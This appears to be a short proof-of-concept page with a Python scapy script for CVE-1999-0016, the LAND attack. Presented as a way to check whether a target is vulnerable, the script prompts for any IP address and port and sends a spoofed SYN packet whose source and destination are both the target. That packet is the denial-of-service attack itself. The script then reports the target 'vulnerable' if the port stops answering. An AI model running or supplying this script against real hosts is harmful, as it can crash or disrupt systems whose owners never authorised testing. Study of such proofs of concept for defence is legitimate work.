CVE-1999-0016

This is a POC tool written in python that can be used to establish whether or not a target is vulnerable to CVE-1999-0016.

from scapy.layers.inet import *
from scapy.all import *

# Holds target IP-address.

ip = input("Please enter the targets IP-address (IPv4): ")
port = int(input("Please enter the port you wish to target: "))

def probe():
    
    # This packet is sent to probe the target. 
    probe = sr1(IP(dst=ip)/TCP(dport=port, flags= 'S'),timeout= 10)
    if probe:
        return True
    else:
        return False

def main():
    print("Checking if target is online and responding..")
    alive = probe()
    if not alive:
        print("Exiting.. Contact couldn't be established.")
        return
    
    # This sends a spoofed packet to the target. 
    spoof = sr1(IP(src=ip,dst=ip)/TCP(sport=port,dport=port,flags = 'S'),timeout=1)
    print("Probing port..")

    # This sends another packet to check if the port is still open or if it closed.
    # If timeout is reached, the target is also considered vulnerable as it responded on the port initially.
    pCheck = sr1(IP(dst=ip)/TCP(dport=port,flags = 'S'),timeout = 5)
    if not pCheck:
        print("Target is vulnerable.")
        return
    
    flag = str(pCheck[TCP].flags)

    if flag == "SA":
        print("Target isn't vulnerable on this port because port is still open.")
        print("Recieved flag: " + flag)
        return

    # Port most likely got closed, considered vulnerable
    print("Target is vulnerable.")
        


if __name__ == "__main__":
    main()